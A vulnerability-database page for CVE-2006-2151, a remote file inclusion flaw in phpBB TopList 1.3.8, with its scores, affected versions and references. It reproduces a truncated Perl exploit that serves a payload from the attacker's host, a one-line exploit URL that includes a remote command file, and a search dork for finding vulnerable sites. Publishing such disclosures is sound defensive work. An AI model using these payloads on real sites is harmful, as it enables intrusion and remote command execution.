CVE-2006-2151
published 2006-05-03CVE-2006-2151: PHP remote file inclusion vulnerability in toplist.php in phpBB TopList 1.3.8 and earlier, when register_globals is enabled, allows remote attackers to include…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.98%
95.3th percentile
PHP remote file inclusion vulnerability in toplist.php in phpBB TopList 1.3.8 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via the phpbb_root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbb_group | phpbb_toplist | <= 1.3.8 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
exploitdb·2006-04-28
CVE-2006-2151 TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
---
# TopList Hack for PHPBB "$hostname",
LocalPort => '9999',
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
if (my $pid = fork){
my $new_sock = $sock->accept();
my $request = ;
print $new_sock "HTTP/1.1 200 OK\n";
print $new_sock "Content-Length: $content_length\n";
print $new_sock "Content-Type: text/plain\n\n";
print $new_sock "\n";
close $new_sock;
exit;
}
print "[+]Injecting command . . .\n";
my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
my $url = "http://$target/$dir/toplist.php";
my $response = $browser->post( $url,
[
'f' => "toplist_top10",
'phpbb_root_path' => "http://$hostname:9999/blah.php"
]
);
die "Received inv
Exploit-DB
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
exploitdb·2006-04-27
CVE-2006-2151 TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
---
Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]
Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
# milw0rm.com [2006-04-27]
No writeups or analysis indexed.
http://secunia.com/advisories/19884http://www.osvdb.org/25260http://www.vupen.com/english/advisories/2006/1601https://exchange.xforce.ibmcloud.com/vulnerabilities/26172https://www.exploit-db.com/exploits/1722https://www.exploit-db.com/exploits/1724http://secunia.com/advisories/19884http://www.osvdb.org/25260http://www.vupen.com/english/advisories/2006/1601https://exchange.xforce.ibmcloud.com/vulnerabilities/26172https://www.exploit-db.com/exploits/1722https://www.exploit-db.com/exploits/1724
2006-05-03
Published